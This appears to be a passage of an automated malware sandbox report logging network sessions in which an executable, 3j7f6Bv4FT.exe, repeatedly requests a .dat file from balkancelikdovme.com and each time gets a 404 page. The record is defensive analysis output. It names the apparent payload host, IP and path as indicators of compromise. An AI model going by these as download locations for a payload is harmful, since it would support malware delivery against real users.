      2025-01-10 22:06:30 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      113192.168.2.450115185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:31 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:31 GMT
      vary: User-Agent
      2025-01-10 22:06:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      114192.168.2.450116185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:32 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:32 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:32 GMT
      vary: User-Agent
      2025-01-10 22:06:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      115192.168.2.450117185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:33 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:33 GMT
      vary: User-Agent
      2025-01-10 22:06:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      116192.168.2.450118185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:33 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:34 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:34 GMT
      vary: User-Agent
      2025-01-10 22:06:34 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      117192.168.2.450119185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:34 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:35 GMT
      vary: User-Agent
      2025-01-10 22:06:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      118192.168.2.450120185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:35 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:36 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:35 GMT
      vary: User-Agent
      2025-01-10 22:06:36 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      119192.168.2.450121185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:36 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:36 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:36 GMT
      vary: User-Agent
      2025-01-10 22:06:36 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      120192.168.2.450122185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:37 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:37 GMT
      vary: User-Agent
      2025-01-10 22:06:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      121192.168.2.450123185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:38 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:38 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:38 GMT
      vary: User-Agent
      2025-01-10 22:06:38 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      122192.168.2.450124185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:39 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:39 GMT
      vary: User-Agent
      2025-01-10 22:06:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      123192.168.2.450125185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:40 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:40 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:40 GMT
      vary: User-Agent
      2025-01-10 22:06:40 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      124192.168.2.450126185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:41 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:41 GMT
      vary: User-Agent
      2025-01-10 22:06:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      125192.168.2.450127185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:41 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:42 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:42 GMT
      vary: User-Agent
      2025-01-10 22:06:42 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      126192.168.2.450128185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:42 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:43 GMT
      vary: User-Agent
